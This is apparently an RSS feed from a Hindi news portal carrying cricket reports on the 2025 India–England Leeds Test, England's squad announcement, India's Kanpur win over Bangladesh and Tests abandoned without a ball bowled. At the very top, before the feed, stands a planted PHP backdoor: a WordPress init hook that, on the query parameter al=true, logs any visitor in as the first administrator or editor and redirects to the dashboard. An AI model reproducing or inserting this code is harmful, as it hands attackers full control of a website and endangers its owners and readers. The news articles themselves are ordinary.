// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); test – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Mon, 23 Jun 2025 05:56:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.4 भारत के नाम रहा तीसरा दिन, 465 पर इंग्लैंड की पहली पारी रोकी, दो विकेट खोकर बनाई 96 रनों की लीड https://pratyushaashakinayikiran.com/?p=165871 Mon, 23 Jun 2025 05:56:00 +0000 https://pratyushaashakinayikiran.com/?p=165871
  • भारत के नाम रहा तीसरा दिन, 465 पर इंग्लैंड की पहली पारी रोकी, दो विकेट खोकर बनाई 96 रनों की लीड
  • लीड्स में 5 विकेट लेकर बुमराह ने रचा कीर्तिमान, कपिल देव के इस रिकॉर्ड की बराबरी की
  • रोमांचक होता जा रहा लीड्स टेस्ट, बुमराह ने इंग्लैंड को बढ़त लेने से रोका, बल्ले से चमक बिखेर रहे राहुल
  • लीड्स

    भारत-इंग्लैंड के बीच खेले जा रहे लीड्स टेस्ट मैच का तीसरा दिन भारत के नाम रहा. पहले टीम इंडिया के गेंदबाजों ने इंग्लैंड की पहली पारी को 465 के स्कोर पर रोक दिया और 6 रन की लीड ले ली. इसके बाद भारत ने 2 विकेट खोकर 90 रन बना लिए. भारत के पास अभी 96 रनों की लीड है. केएल राहुल 47 और शुभमन गिल 6 रन पर नाबाद हैं. जबकि यशस्वी जायसवाल 4 और साई सुदर्शन 30 रन बनाकर आउट हो चुके हैं.

    बता दें कि भारतीय टीम ने शुभमन गिल, ऋषभ पंत और यशस्वों जायसवाल के शतकों की मदद से अपनी पहली पारी में 471 रन बनाए थे. इसके जवाब में उतरी इंग्लैंड की पहली पारी 465 के स्कोर पर सिमट गई.

    भारत की दूसरी पारी अबतक

    पहली पारी में 6 रन की लीड के बाद केएल राहुल और यशस्वी की जोड़ी मैदान में पहुंची. लेकिन टीम इंडिया की दूसरी इनिंग की शुरुआत अच्छी नहीं रही. 16 के स्कोर पर ही भारत को पहला झटका लगा जब यशस्वी 4 रन बनाकर आउट हो गए. इसके बाद साई सुदर्शन और केएल राहुल के बीच अच्छी साझेदारी हुई, दोनों ने 65 से ज्यादा रन जोड़े. लेकिन साई सुदर्शन 30 रन बनाकर आउट हो गए. लेकिन दिन का खेल खत्म होने तक भारत ने 96 रनों की लीड ले रखी थी.

    लीड्स में 5 विकेट लेकर बुमराह ने रचा कीर्तिमान
    भारत और इंग्लैंड के बीच खेले जा रहे पहले टेस्ट मैच में जसप्रीत बुमराह ने एक बार फिर साबित कर दिया कि वह भारतीय गेंदबाज़ी के सबसे भरोसेमंद सिपाही हैं. बुमराह ने इंग्लैंड की पहली पारी में घातक गेंदबाज़ी करते हुए 5 विकेट झटके और इसके साथ ही विदेशी ज़मीं पर सबसे ज़्यादा पांच विकेट लेने वाले भारतीय गेंदबाज़ों की फेहरिस्त में कपिल देव के बराबर आ गए.

    बुमराह के नाम अब 12 बार विदेशी टेस्ट मैचों में पांच विकेट लेने का कारनामा दर्ज हो चुका है, और उन्होंने यह मुकाम सिर्फ 34 टेस्ट मैचों में हासिल कर लिया है. इस सूची में उन्होंने भारतीय क्रिकेट के दिग्गज ऑलराउंडर कपिल देव की बराबरी की है. कपिल देव ने भी 12 बार विदेशी धरती पर 5 विकेट झटके थे. लेकिन इसके लिए उन्हें 66 टेस्ट मैच खेलने पड़े थे.

    रोमांचक होता जा रहा लीड्स टेस्ट

    भारत और इंग्लैंड के बीच खेला जा रहा लीड्स टेस्ट रोमांचक मोड़ पर है। मैच के तीसरे दिन इंग्लैंड की पहली पारी 465 रनों पर सिमट गई। पहली पारी के आधार पर टीम इंडिया को सिर्फ 6 रनों की बढ़त मिली। तीन दिन स्टंप के समय भारत ने 2 विकेट पर 90 रन बना लिए हैं। इस तरह टीम की बढ़त 96 रनों की हो चुकी है। केएल राहुल 47 रन बनाकर नाबाद हैं तो कप्तान शुभमन गिल भी 6 रन बनाकर खेल रहे हैं। खराब रौशनी की वजह से खेल करीब 25 मिनट पहले ही खत्म करना पड़ा। दूसरी पारी में भारतीय टीम की शुरुआत खराब रही। यशस्वी जायसवाल सिर्फ 4 रन बनाकर ब्रायडन कार्स का शिकार बन गए। इसके बाद डेब्यू टेस्ट खेल रहे साई सुदर्शन ने राहुल का साथ दिया। दोनों ने आसानी से रन बनाए। इनके बीच 66 रनों की साझेदारी हुई। सुदर्शन 48 गेंद पर 30 रन बनाकर आउट हुए।

    हैरी ब्रूक शतक लगाने से चूके
    हैरी ब्रूक (99) एक रन से शतक से चूक गए जिसके बाद जसप्रीत बुमराह ने पांच विकेट चटकाए। टी ब्रेक से पहले इंग्लैंड की पारी सिमट गई। बुमराह ने जोश टंग (11) को बोल्ड करके इंग्लैंड की पारी का अंत किया लेकिन इससे पहले निचले क्रम में क्रिस वोक्स (55 गेंद में 38 रन) ने तेजी से रन जुटाकर मेजबान टीम को भारत के 471 रन के स्कोर के करीब पहुंचाया।इंग्लैंड के निचले क्रम ने भारत की मजबूत बढ़त हासिल करने की उम्मीदों पर पानी फेर दिया जिससे अब दोनों टीम की दूसरी पारियां बेहद महत्वपूर्ण हो गई हैं।

    प्रसिद्ध कृष्णा (128 रन पर तीन विकेट) ने शॉर्ट गेंद पर जेमी स्मिथ (40) और ब्रूक (99 रन, 112 गेंद, 11 चौके, दो छक्के) को आउट किया लेकिन अपनी 20 ओवर की गेंदबाजी में रन गति पर अंकुश लगाने में नाकाम रहे। बुमराह (83 रन पर पांच विकेट) पूरी पारी के दौरान भारत के सर्वश्रेष्ठ गेंदबाज रहे। उन्होंने टेस्ट क्रिकेट में 14वीं बार पारी में पांच या इससे अधिक विकेट चटकाए। मैच में भारत के फील्डर्स ने निराश किया। ब्रूक को 82 रन पर बुमराह की गेंद पर यशस्वी जायसवाल ने दूसरा जीवनदान दिया। ब्रूक हालांकि इन मौकों का फायदा उठाकर शतक नहीं बना सके और 88वें ओवर में 99 रन के स्कोर पर प्रसिद्ध की गेंद पर शार्दुल को कैच दे बैठे।

    दूसरे नई गेंद से विकेट नहीं मिले
    भारत ने 80 ओवर के बाद नई गेंद ली थी लेकिन टीम इसका अच्छा इस्तेमाल नहीं कर पाई। वोक्स ने सत्र के अंत में प्रसिद्ध की लगातार गेंदों पर मिड विकेट और थर्ड मैन पर छक्के मारे। उन्हें बुमराह ने बोल्ड किया जबकि मोहम्मद सिराज (122 रन पर दो विकेट) ने ब्राइडन कार्स (22) की पारी का अंत किया। इससे पहले इंग्लैंड ने दिन की शुरुआत तीन विकेट पर 209 रन से की और सुबह के सत्र में 28 ओवर में 118 रन जोड़े।

    भारत ने सुबह के सत्र में कल के शतकवीर ओली पोप (106 रन) और इंग्लैंड के कप्तान बेन स्टोक्स (20) के विकेट चटकाए। दूसरे दिन की तरह तीसरे दिन भी प्रसिद्ध, शार्दुल ठाकुर और मोहम्मद सिराज की तिकड़ी अपने साथी तेज गेंदबाज बुमराह की तरह सटीक गेंदबाजी करने में नाकाम रही। दूसरे दिन का खेल खत्म होने से पहले बुमराह की नोबॉल पर आउट होने वाले ब्रूक को 46 रन के निजी स्कोर पर जीवनदान मिला जब बाएं हाथ के स्पिनर रविंद्र जडेजा की तेजी से स्पिन होती गेंद पर विकेटकीपर ऋषभ पंत उनका कैच लपकने में नाकाम रहे।

    सुबह का सत्र हालांकि ब्रूक के नाम रहा जिन्होंने कई आकर्षक शॉट खेले। प्रसिद्ध ने दिन के पहले ओवर में दो ढीली गेंद फेंकी जिसमें से एक पर ब्रूक ने प्वाइंट पर चौका और दूसरी पर मिड विकेट के ऊपर से छक्का जड़ा। ब्रूक ने बुमराह सहित तेज गेंदबाजों के खिलाफ आगे बढ़कर खेलने की रणनीति अपनाई और एक्सट्रा कवर के ऊपर से ड्राइव लगाए। प्रसिद्ध ने अगले ओवर में पोप को आउट किया जो उनकी शॉर्ट और वाइड गेंद से छेड़छाड़ की कोशिश में पंत को कैच दे बैठे। स्टोक्स भी विकेट पर नजरें जमाने के बाद सिराज की गेंद पर पंत को कैच दे बैठे।

    विदेश में सबसे ज्यादा पांच विकेट लेने वाले भारतीय गेंदबाज

    12– जसप्रीत बुमराह (34 टेस्ट)
    12 – कपिल देव (66 टेस्ट)
    9 – ईशांत शर्मा (63 टेस्ट)
    8 – ज़हीर ख़ान (54 टेस्ट)
    7 – इरफ़ान पठान (15 टेस्ट)

    यह आंकड़ा न केवल बुमराह की प्रतिभा का प्रतीक है, बल्कि यह भी दर्शाता है कि वे भारतीय क्रिकेट के इतिहास में कितने खास गेंदबाज़ हैं. बुमराह ने इस मुकाबले में तीन खिलाड़ियों को बोल्ड किया. जिसमें डकेट, टंग और क्रिस वोक्स का नाम शामिल है. इसके अलावा बुमराह ने जो रूट और क्राउली को भी पवेलियन भेजा. बुमराह ने 24.4 ओवर गेंदबाजी की और 83 रन देकर 5 विकेट झटके. इसके चलते इंग्लैंड की पहली पारी 465 के स्कोर पर सिमट गई और भारत के पास 6 रन की बढ़त रही. भारत ने पहली पारी में 471 रन बनाए थे. 

    भारत-इंग्लैंड के बीच H2H (इंग्लैंड में)  
    कुल टेस्ट: 67
    भारत जीता: 9
    इंग्लैंड जीता: 36
    ड्रॉ: 22 

    भारत-इंग्लैंड के बीच H2H (भारत में) 
    कुल टेस्ट: 69
    भारत जीता: 26
    इंग्लैंड जीता:15
    ड्रॉ: 28

     

     

    ]]>
    भारत के ख‍िलाफ पहले टेस्ट के ल‍िए इंग्लैंड टीम का ऐलान, 3 साल बाद इस पेसर का कमबैक https://pratyushaashakinayikiran.com/?p=161725 Thu, 05 Jun 2025 16:16:00 +0000 https://pratyushaashakinayikiran.com/?p=161725 लंदन

     भारत के खिलाफ लीड्स (हेड‍िंग्ले) में होने पहले टेस्ट मैच के लिए इंग्लैंड ने अपनी क्रिकेट टीम का ऐलान कर दिया है. 14 सदस्यीय स्क्वॉड में तेज गेंदबाज जेमी ओवरटन की 3 साल बाद टेस्ट टीम में वापसी हुई है. ओवरटन लंबे समय से टीम से बाहर चल रहे थे, वहीं गस एट‍िंक्सन को मौका नहीं मिला है.

    ओवरटन ने आखिरी बार जून 2022 में हेडिंग्ले में न्यूजीलैंड के खिलाफ इंग्लैंड के लिए टेस्ट मैच खेला था. हाल ही में वेस्टइंडीज के खिलाफ पहले वनडे के दौरान उनकी दाहिनी हाथ की छोटी उंगली में फ्रैक्चर हो गया, जिसके बाद इंग्लैंड की मेडिकल टीम उनकी कंडीशन पर नजर बनाए हुए है.

    इंग्लैंड की 14 सदस्यीय टीम में कई अहम चेहरे लौटे हैं. इनमें तेज़ गेंदबाज़ ब्रायडन कार्से जैकब बथेल और अनुभवी ऑलराउंडर क्रिस वोक्स की वापसी हुई है. ये तीनों खिलाड़ी आखिरी बार दिसंबर में न्यूजीलैंड के खिलाफ टेस्ट सीरीज में नजर आए थे, जबकि कार्से और वोक्स हाल ही में जिम्बाब्वे के खिलाफ़ चोट के चलते नहीं खेल पाए थे.

    वहीं पेस बॉलर गस एटकिंसन हैमस्ट्रिंग चोट के कारण इस बार चयन के लिए उपलब्ध नहीं हैं. उन्होंने पिछले महीने ट्रेंट ब्रिज में जिम्बाब्वे के खिलाफ टेस्ट खेला था, लेकिन पूरी तरह फिट ना होने के कारण वह भारत के खिलाफ पहले टेस्ट से बाहर रहेंगे. भारत और इंग्लैंड के बीच पांच टेस्ट मैचों सीरीज का पहला मुकाबला 20 जून से लीड्स के हेडिंग्ले मैदान पर खेला जाएगा.

    इंग्लैंड और भारत की टीम में बड़े बदलाव
    इंग्लैंड की टीम में पिछले 18 महीनों में काफी बदलाव हुआ है. जब उन्हें भारत में 4-1 से टेस्ट सीरीज में हार मिली थी, उसके बाद कई बड़े खिलाड़ी टीम से बाहर हो गए. जेम्स एंडरसन ने उस दौरे के बाद क्रिकेट से संन्यास ले लिया. जॉनी बेयरस्टो, बेन फॉक्स और ओली रॉबिन्सन को भी अब टीम में नहीं रखा गया है.

    भारत की टीम में भी बड़ा बदलाव देखने को मिला है. रविचंद्रन अश्विन, विराट कोहली और रोहित शर्मा जैसे सीनियर खिलाड़ियों ने संन्यास ले लिया है. अब शुभमन गिल भारत की टेस्ट टीम के नए कप्तान बने हैं और पहली बार टीम की कमान संभालेंगे.

    सीरीज की शुरुआत हेडिंग्ले से होगी और फिर मुकाबले एजबेस्टन, लॉर्ड्स, ओल्ड ट्रैफर्ड और आखिर में ओवल में खेले जाएंगे. भारत ने 2007 के बाद से इंग्लैंड में कोई टेस्ट सीरीज नहीं जीती है. इस बार कुछ भारतीय खिलाड़ी पहले से ही इंग्लैंड में हैं और इंडिया ए टीम के लिए इंग्लैंड लॉयंस के खिलाफ खेल रहे हैं. बाकी खिलाड़ी शुक्रवार को इंग्लैंड पहुंचेंगे.

    भारत के खिलाफ पहले टेस्ट के लिए इंग्लैंड की टीम: बेन स्टोक्स (कप्तान), शोएब बशीर, जैकब बथेल, हैरी ब्रूक, ब्रायडन कार्स, सैम कुक, जैक क्रॉली, बेन डकेट, जेमी ओवरटन, ओली पोप, जो रूट, जेमी स्मिथ, जोश टंग, क्रिस वोक्स.

    इंग्लैंड दौरे के लिए 18 सदस्यीय भारतीय टीम: शुभमन गिल (कप्तान), यशस्वी जायसवाल, केएल राहुल, साई सुदर्शन, ऋषभ पंत (उप-कप्तान/विकेटकीपर), नीतीश कुमार रेड्डी, रवींद्र जडेजा, ध्रुव जुरेल (विकेटकीपर), अभिमन्यु ईश्वरन, शार्दुल ठाकुर, जसप्रीत बुमराह, मोहम्मद सिराज, प्रसिद्ध कृष्णा, करुण नायर, वॉशिंगटन सुंदर, आकाश दीप, अर्शदीप सिंह, कुलदीप यादव.

    इंग्लैंड की धरती पर भारत का रिकॉर्ड
    इंग्लैंड की धरती पर भारत की जीत का टेस्ट रिकॉर्ड अच्छा नहीं है. इंग्लैंड के खिलाफ उसके घर में भारत ने अब तक (1932-2022) 67 टेस्ट मैच खेले है.  इनमें से भारत को सिर्फ 9 टेस्ट में जीत मिली है, जबकि 36 मैचों में हार झेलनी पड़ी. 22 मैच ड्रॉ रहे.  महेंद्र सिंह धोनी (2011-2014) का कप्तान के तौर पर इंग्लैंड की धरती पर खराब रिकॉर्ड रहा. 9 टेस्ट मैचों में भारत को एक ही जीत मिली, जबकि इंग्लिश टीम को 7 में जीत मिली. एक मैच ड्रॉ रहा.

    20 जून से शुरू हो रही है सीरीज
    भारत और इंग्लैंड के बीच पांच मैचों की टेस्ट सीरीज हेडिंग्ले के लीड्स क्रिकेट ग्राउंड पर शुरू होने वाली है, जिसका पहला मैच 20 से 24 जून तक होगा. अगला टेस्ट बर्मिंघम के एजबेस्टन क्रिकेट ग्राउंड में 2 से 6 जुलाई तक आयोजित किया जाएगा.तीसरा टेस्ट 10 जुलाई से 14 जुलाई तक लंदन के लॉर्ड्स क्रिकेट ग्राउंड में होगा. फ‍िर मैनचेस्टर 23 जुलाई से 27 जुलाई तक ओल्ड ट्रैफर्ड में चौथे टेस्ट की मेजबानी करेगा. इस रोमांचक सीरीज का पांचवां और अंतिम मुकाबला 31 जुलाई से 4 अगस्त तक लंदन के द ओवल में खेला जाना है.

    भारत बनाम इंग्लैंड टेस्ट सीरीज का पूरा शेड्यूल
    पहला टेस्ट: 20-24 जून, 2025 – हेडिंग्ले, लीड्स
    दूसरा टेस्ट: 2-6 जुलाई, 2025 – एजबेस्टन, बर्मिंघम
    तीसरा टेस्ट: 10-14 जुलाई, 2025 – लॉर्ड्स, लंदन
    चौथा टेस्ट: 23-27 जुलाई, 2025 – ओल्ड ट्रैफर्ड, मैनचेस्टर
    पांचवां टेस्ट: 31 जुलाई-4 अगस्त, 2025 – द ओवल, लंदन

    ]]>
    कानपुर टेस्ट में भारत ने बांग्लादेश को 7 विकेट से हराया, सीरीज में 2-0 से किया क्लीन स्वीप https://pratyushaashakinayikiran.com/?p=78018 Tue, 01 Oct 2024 14:20:00 +0000 https://pratyushaashakinayikiran.com/?p=78018 कानपुर

     भारतीय क्रिकेट टीम ने अपने शानदार खेल के दम पर कानपुर में खेले गए दूसरे टेस्ट मैच में बांग्लादेश 7 विकेट से हरा दिया। इसी के साथ भारत ने दो मैचों की टेस्ट सीरीज 2-0 से अपने नाम कर ली है। बांग्लादेश ने भारत के सामने सिर्फ 95 रनों का टारगेट रखा था। टीम इंडिया ने ग्रीन पार्क स्टेडियम में खेले गए इस मैच में टारगेट को ओवरों में 17.2 ओवरों में तीन विकेट खोकर हासिल कर लिया।

    बांग्लादेश की पहली पारी 233 रनों पर सिमट गई थी। फिर टीम इंडिया ने अपनी पहली पारी नौ विकेट के नुकसान पर 285 रनों पर घोषित कर और 52 रनों की बढ़त ले ली थी। फिर बांग्लादेश दूसरी पारी में 146 रनों पर ढेर हो गई और भारत को आसान सा लक्ष्य मिला।  कानपुर टेस्ट मैच में विनिंग रन ऋषभ पंत के बल्ले से निकले। उन्होंने चौका जड़कर जीत दिलाई। भारत ने 7 विकेट से जीत दर्ज की। सीरीज में 2-0 से जीत हासिल की।

     यशस्वी ने दोनों पारियों में जड़ा अर्धशतक

    टीम इंडिया के उभरते हुए सितारे यशस्वी जायसवाल ने कानपुर टेस्ट की दोनों पारियों में शानदार बैटिंग की और अर्धशतक ठोका। दूसरी पारी में विराट कोहली का भी बल्ला बोला और उन्होंने 29 रनों की नाबाद पारी खेली। विकेट कीपर बल्लेबाज ऋषभ पंत ने चौका लगाकर भारत को यादगार जीत दिलाई।

     सिर्फ 52 ओवर खेलकर मिली जीत

    कानपुर में भारत की जीत किसी करिश्मे से कम नहीं है। पहला दिन सिर्फ 35 ओवर का खेला हुआ था, अगला दो दिन बारिश के कारण धुल गया। इसके बावजूद भारत ने सिर्फ 52 ओवर बैटिंग कर बांग्लादेश का काम तमाम कर दिया।

    कानपुर में भारत की शानदार जीत

     भारत ने कानपुर टेस्ट में बांग्लादेश को 7 विकेट से रौंदकर नामुमकिन को मुमकिन कर दिखाया। इसके साथ ही रोहित शर्मा की टीम ने 2 मैचों की सीरीज पर 2-0 से कब्जा कर लिया।
     
    बांग्लादेश 146 पर ऑलआउट

    कानपुर टेस्ट की दूसरी पारी में बांग्लादेश की टीम 146 रन पर ऑलआउट हो गई। रविचंद्रन अश्विन, जडेजा और बुमराह ने 3-3 विकेट चटकाए, वहीं एक विकेट आकाश दीप ने लिया। भारत को ऐतिहासिक जीत के लिए 95 रन बनाने की जरूरत है।

    इस मैच में पहले दिन सिर्फ 35 ओवरों का खेल हो पाया था. इसके बाद अगले दो दिनों तक बारिश के चलते एक भी गेंद नहीं फेंकी जा सकी. इसके बाद मैच के चौथे दिन भारत ने बांग्लादेश को 233 रनों पर समेट दिया.

    इसके बाद टीम इंडिया ने ताबड़तोड़ अंदाज में रन ठोककर सभी को हैरान कर दिया. भारत ने 34.4 ओवर में 9 विकेट गंवाकर 285 रन पर पारी घोषित कर दी. इसके बाद बांग्लादेश को दूसरी पारी में उसने 146 रनों पर समेट दिया. इसके आधार पर भारत को सिर्फ 95 रनों का टारगेट मिला था, जिसे उसने यशस्वी जायसवाल की फिफ्टी के दम पर आराम से अपने नाम कर लिया. जायसवाल 51 रन बनाकर आउट हुए.

    ]]>
    बिना एक गेंद खेले 7 टेस्ट जो हो गए रद्द, ऐसे ही हुआ था ODI का जन्म https://pratyushaashakinayikiran.com/?p=69457 Thu, 12 Sep 2024 16:46:00 +0000 https://pratyushaashakinayikiran.com/?p=69457 नई दिल्ली
    अफगानिस्तान वर्सेस न्यूजीलैंड टेस्ट को यूं बारिश की भेंट चढ़ता देख क्रिकेट फैंस हैरान हैं, क्योंकि 21वीं सदी में ऐसा पहली बार हो रहा है। मगर टेस्ट क्रिकेट में ये कोई नई बात नहीं है। टेस्ट क्रिकेट के इतिहास में कुल 7 मुकाबले बारिश के भेंट चढ़े हैं जो बिना गेंद खेले रद्द किए गए, इनमें से एक मुकाबला ऐसा है जिसने वनडे क्रिकेट को भी जन्म दिया। जी हां, यह बात 1970-71 की है जब ऑस्ट्रेलिया और इंग्लैंड के बीच एक टेस्ट मैच बारिश की भेंट चढ़ गया था, तब एमसीसी मैनेजर, ऑस्ट्रेलियाई बोर्ड और 2 एमसीसी अधिकारियों से चर्चा के बाद एक दिन का मैच खेला गया था, जिसे अधिकारिक रूप से पहला वनडे मुकाबला गिना जाता है। यह वनडे मैच 40-40 ओवर का हुआ था और सफेद जर्सी में लाल गेंद से खेला गया था।

    आईए अब एक नजर डालते है बिना कोई गेंद डले रद्द हुए टेस्ट मैचों की लिस्ट पर-

    टेस्ट नंबर: 34 – ऑस्ट्रेलिया बनाम इंग्लैंड, ओल्ड ट्रैफर्ड, मैनचेस्टर

    टेस्ट नंबर 34a बारिश के कारण रद्द होने वाला पहला मैच था। इस मैच का टॉस भी नहीं हुआ था।
    टेस्ट नंबर: 264 – ऑस्ट्रेलिया बनाम इंग्लैंड, ओल्ड ट्रैफर्ड, मैनचेस्टर

    टेस्ट नंबर 264a भी बारिश के कारण रद्द हो गया। कोई टॉस नहीं हुआ था।
    टेस्ट नंबर: 675 – ऑस्ट्रेलिया बनाम इंग्लैंड, मेलबर्न क्रिकेट ग्राउंड

    टेस्ट नंबर 675a ​​के दौरान, जैसे ही खिलाड़ी मैदान में प्रवेश कर रहे थे, बारिश शुरू हो गई। MCC मैनेजर, ऑस्ट्रेलियाई बोर्ड और 2 MCC अधिकारियों के बीच चर्चा हुई और यह निष्कर्ष निकाला गया कि सीमित ओवरों का मैच खेला जाना चाहिए और बाद में इस मैच को पहला ODI माना गया।
    टेस्ट नंबर: 1113 – न्यूजीलैंड बनाम पाकिस्तान, कैरिसब्रुक, डुनेडिन

    टेस्ट नंबर 1113a में, भारी बारिश के कारण, 3 फरवरी 1989 को मैच रद्द कर दिया गया था। साथ ही, यह योजना बनाई गई थी कि 6 फरवरी 1989 को एक वनडे मैच खेला जाएगा और यह वनडे तय कार्यक्रम के अनुसार खेला गया।
    टेस्ट नंबर: 1140 – इंग्लैंड बनाम वेस्टइंडीज, बोर्डा, जॉर्जटाउन, गुयाना

    टेस्ट नंबर 1140a बारिश के कारण रद्द कर दिया गया था। इस मैच के 5वें दिन, एक वनडे मैच खेला गया।
    टेस्ट नंबर: 1434 – पाकिस्तान बनाम जिम्बाब्वे, इकबाल स्टेडियम, फैसलाबाद

    पाकिस्तान बनाम जिम्बाब्वे टेस्ट बिना टॉस हुए ही रद्द हो गया था।
    टेस्ट नंबर: 1434 – न्यूजीलैंड बनाम भारत, कैरिसब्रुक, डुनेडिन

    टेस्ट नंबर 1434बी तीसरे दिन रद्द कर दिया गया। यह तय किया गया कि चौथे दिन एक अनौपचारिक एक दिवसीय मैच खेला जाएगा।

    ]]>